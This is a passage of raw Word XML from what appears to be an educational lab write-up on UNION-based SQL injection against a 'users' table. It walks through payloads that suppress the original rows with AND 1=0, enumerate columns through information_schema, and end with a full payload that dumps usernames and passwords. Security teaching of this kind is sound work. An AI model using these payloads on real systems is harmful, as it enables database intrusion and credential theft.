          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>evaluates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false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>so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rows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 original query are returned, and only rows from the UNION SELECT get displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3EA232" w14:textId="77777777" w:rsidR="002D34AF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121"/>
        <w:ind w:left="502" w:hanging="196"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>union</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2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combines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result 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original</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>query's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>expected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output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E149E8" w14:textId="77777777" w:rsidR="002D34AF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163" w:line="278" w:lineRule="auto"/>
        <w:ind w:right="708" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'Table:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-5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combines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label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'Table:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'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name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each table found in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDD18C8" w14:textId="77777777" w:rsidR="002D34AF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118" w:line="278" w:lineRule="auto"/>
        <w:ind w:right="458" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'Column:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2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combines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label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'Column:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'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of each column in the specified table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360C7FC8" w14:textId="77777777" w:rsidR="002D34AF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121" w:line="278" w:lineRule="auto"/>
        <w:ind w:right="616" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: This is a system table in MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>that stores metadata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>about</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>every</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>column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entire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>database.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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queries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3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>in the 'users' table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188EEE4E" w14:textId="77777777" w:rsidR="002D34AF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117" w:line="278" w:lineRule="auto"/>
        <w:ind w:right="693" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'users</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2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Filters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query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users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr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3E58E739" w14:textId="77777777" w:rsidR="002D34AF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121"/>
        <w:ind w:left="502" w:hanging="196"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-5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15"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Avoids</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>syntax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>errors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cancelling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>out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rest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original</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AB5B15" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="86"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD22B9E" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(How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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>executes):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE010F6" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="44" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="306" w:right="2748"/>
      </w:pPr>
      <w:r>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>first_name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last_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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id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'' AND 1=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF76890" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="306" w:right="537"/>
      </w:pPr>
      <w:r>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'Table:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'Column:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) 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</w:p>
    <w:p w14:paraId="507322D2" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="274" w:lineRule="exact"/>
        <w:ind w:left="306"/>
      </w:pPr>
      <w:r>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'users'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:t>--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rest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="808080"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="808080"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ignored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0BA934" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="86"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="166724B5" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="306"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Columns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derived: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color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>first_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>last_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>user,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>password,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>avatar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF7EE20" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="002D34AF">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="1133" w:bottom="280" w:left="1417" w:header="717" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B770834" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="80" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="306" w:right="274"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Payload:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>'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1=0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union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select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>first_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>'Last: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',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>last_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>,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'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|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User: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',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user,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'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| Pass: ', password) from users #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2082B724" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3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9616" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="59298126" wp14:editId="284C8232">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1094739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>76073</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5706475" cy="2475166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475" cy="2475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B8AA7B" w14:textId="77777777" w:rsidR="002D34AF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75"/>
        <w:ind w:left="502" w:hanging="196"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2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Ends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original</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>string, allowing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>us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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>raw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10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>logic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after </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347118AF" w14:textId="77777777" w:rsidR="002D34AF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164" w:line="278" w:lineRule="auto"/>
        <w:ind w:right="676" w:firstLine="0"/>
        <w:rPr>
